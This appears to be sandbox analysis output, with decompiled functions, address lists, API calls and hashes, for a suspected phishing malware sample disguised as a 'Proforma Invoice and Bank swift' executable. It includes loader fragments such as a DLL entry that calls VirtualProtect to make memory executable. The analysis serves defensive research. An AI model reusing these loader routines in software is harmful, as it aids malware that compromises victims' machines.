												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x0040643a
0x0040643a
0x0040643e
0x00406467
0x00406471
0x00406440
0x00406449
0x00406456
0x00406459
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x0040679d
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x0040681f
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x004067a0
0x0040679d

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405841
0x0040584e
0x00405863
0x00405869

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe,80000000,00000003), ref: 00405841
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405822
0x0040582b
0x00000000
0x00405834
0x0040583a

APIs

GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 6F732A38, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E6F732A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x6f734040 != 0 && E6F73297D(_a4) == 0) {
					 *0x6f734044 = _t93;
					if( *0x6f73403c != 0) {
						_t93 =  *0x6f73403c;
					} else {
						E6F732F60(E6F732977(), __ecx);
						 *0x6f73403c = _t93;
					}
				}
				_t28 = E6F7329AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6F73299F();
					_t72 = _a4;
					_t79 =  *0x6f734048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x6f734048 = _t72;
					E6F732999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x6f73401c = _t33;
					 *0x6f734020 = _t79;
					if( *0x6f734040 != 0 && E6F73297D( *0x6f734048) == 0) {
						 *0x6f73403c = _t94;
						_t94 =  *0x6f734044;
					}
					_t80 =  *0x6f734048;
					_a4 = _t80;
					 *0x6f734048 =  *((intOrPtr*)(E6F73299F() + _t80));
					_t37 = E6F73298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E6F7329AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6F7329B6() + _a4 + _v8);
							_push(E6F7329C0());
							if( *0x6f734040 <= 0 || E6F73297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x6f73403c =  *0x6f73403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x6f734048;
					if( *0x6f734048 == 0) {
						 *0x6f73403c = 0;
					}
					E6F7329E4(_t107, _a4,  *0x6f73401c,  *0x6f734020);
					return _a4;
				}
				_push(E6F7329B6() + _a4);
				_t56 = E6F7329BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E6F7329C8();
				_t87 = E6F7329C4();
				_t90 = E6F7329C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6f732a48
0x6f732a59
0x6f732a66
0x6f732a7a
0x6f732a68
0x6f732a6d
0x6f732a72
0x6f732a72
0x6f732a66
0x6f732a83
0x6f732a88
0x6f732a8e
0x6f732ad2
0x6f732ad2
0x6f732ad7
0x6f732adc
0x6f732ae2
0x6f732ae4
0x6f732aea
0x6f732af7
0x6f732af9
0x6f732afe
0x6f732b0b
0x6f732b1e
0x6f732b24
0x6f732b2a
0x6f732b2b
0x6f732b31
0x6f732b3d
0x6f732b43
0x6f732b4b
0x6f732b4c
0x6f732b4f
0x6f732b5a
0x6f732b5c
0x6f732b68
0x6f732b6e
0x6f732b76
0x6f732ba2
0x6f732ba3
0x6f732ba5
0x6f732ba9
0x6f732ba9
0x6f732bb0
0x6f732b86
0x6f732b86
0x6f732b87
0x6f732b95
0x6f732b9e
0x6f732b9e
0x6f732b76
0x6f732b5a
0x6f732bb2
0x6f732bb9
0x6f732bbb
0x6f732bbb
0x6f732bd4
0x6f732be2
0x6f732be2
0x6f732a99
0x6f732a9a
0x6f732a9f
0x6f732aa3
0x6f732aa8
0x6f732abc
0x6f732abd
0x6f732abe
0x6f732ac0
0x6f732ac5
0x6f732ac7
0x6f732ac7
0x6f732aca
0x6f732ad0
0x00000000

APIs

EnumSystemCodePagesW.KERNELBASE(00000000), ref: 6F732AF7

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CodeEnumPagesSystem
String ID:
API String ID: 2369445336-0
Opcode ID: 0296f2d483bd60be14d843e9a5495128cfdc2101590a1b6be1010b9e1778bf25
Instruction ID: 938b826ea71aa5dc2bd5d9a3ec7af1483903025f70e8cd2782dbcef1acd2fd1e
Opcode Fuzzy Hash: 0296f2d483bd60be14d843e9a5495128cfdc2101590a1b6be1010b9e1778bf25
Instruction Fuzzy Hash: 6B418B73E04724FBDB249FA4DA84B593774FB85329F2044B6E400D6296D736A4A0EFE1

Uniqueness

Uniqueness Score: -1.00%

Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031c3
0x004031d6
0x004031de
0x00000000
0x004031e5
0x00000000
0x004031e7

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F732921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6f734038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6f73404c, 4, 0x40, 0x6f73403c); // executed
					 *0x6f73404c = 0xc2;
					 *0x6f73403c = 0;
					 *0x6f734044 = 0;
					 *0x6f734058 = 0;
					 *0x6f734048 = 0;
					 *0x6f734040 = 0;
					 *0x6f734050 = 0;
					 *0x6f73404e = 0;
				}
				return 1;
			}

0x6f73292a
0x6f73292f
0x6f73293f
0x6f732947
0x6f73294e
0x6f732953
0x6f732958
0x6f73295d
0x6f732962
0x6f732967
0x6f73296c
0x6f73296c
0x6f732974

APIs

VirtualProtect.KERNELBASE(6F73404C,00000004,00000040,6F73403C), ref: 6F73293F

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 657fd968fe3abf1dc043188da7cde89809bf374e683df7c76161d9f4e86a87c0
Instruction ID: d3dbe59e411ed91bafde0659089c67c95e86a6c23cbacdc8571f59d2765565ec
Opcode Fuzzy Hash: 657fd968fe3abf1dc043188da7cde89809bf374e683df7c76161d9f4e86a87c0
Instruction Fuzzy Hash: 7BF092B3B08AA0FECB78CF6886847053EE0B79A366F0145FBE158D6241E3364064AF11

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

